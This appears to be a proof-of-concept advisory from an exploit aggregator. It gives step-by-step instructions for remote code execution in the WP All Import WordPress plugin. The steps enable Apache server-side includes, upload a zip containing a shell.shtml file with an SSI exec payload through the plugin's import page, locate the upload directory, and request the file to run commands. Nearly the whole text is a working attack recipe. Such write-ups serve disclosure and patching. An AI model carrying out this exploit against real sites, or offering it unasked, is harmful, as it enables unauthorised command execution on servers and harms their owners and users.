## https://sploitus.com/exploit?id=WPEX-ID:7F947305-7A72-4C59-9AE8-193F437FD04E
1. Configure the Apache server with mod_include and mod_cgi enabled, and enable server-side includes:
Options Includes
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
2. Create a zip file including a CSV file and a file `shell.shtml` with the following contents:
<!--#exec cmd="id" -->
3. As a site administrator on a multisite instance, visit /wp-admin/admin.php?page=pmxi-admin-import
4. Click "Upload a file" and choose the zip file created previously.
5. View the response of the AJAX request to /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=... to find the directory of the uploaded zip file.
6. Directly access `shell.shtml` (e.g. at `https://example.com/wp-content/uploads/wpallimport/uploads/abc123/zipfilename/shell.shtml`) to trigger the RCE.